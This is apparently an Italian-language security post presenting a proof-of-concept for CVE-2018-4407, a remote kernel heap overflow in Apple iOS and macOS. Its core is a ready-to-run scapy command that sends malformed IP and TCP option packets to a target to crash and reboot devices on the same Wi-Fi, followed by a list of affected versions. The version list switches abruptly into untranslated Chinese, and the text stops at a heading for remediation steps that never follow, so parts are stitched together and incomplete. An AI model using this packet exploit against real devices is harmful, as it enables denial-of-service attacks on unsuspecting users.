
iOS 12 / OS X Overflow dello heap del kernel remoto (CVE-2018-4407) POC
iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
o utilizzando lo script
python check_icmp_dos.py 127.0.0.1
Questa vulnerabilità consente a un aggressore, semplicemente connettendosi alla stessa rete Wi-Fi, di inviare pacchetti dannosi ad altri utenti ignari per causare il crash e il riavvio di qualsiasi dispositivo Mac o iOS. Poiché la vulnerabilità risiede nel codice core della rete di sistema, nessun software antivirus è in grado di difendersi.
I dispositivi che eseguono i seguenti sistemi operativi sono vulnerabili:
Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)
Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)
Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)
Apple OS X El Capitan及更早版本:所有设备
Attualmente, Apple ha rilasciato un aggiornamento alla versione iOS 12.1 che corregge la vulnerabilità. Si consiglia agli utenti di verificare la versione del sistema e, se interessati, di adottare tempestivamente le misure correttive. Le misure di correzione della vulnerabilità sono le seguenti: